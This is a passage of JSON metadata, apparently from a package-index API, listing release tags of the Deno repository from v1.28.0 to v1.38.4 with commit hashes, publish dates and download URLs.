itories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecos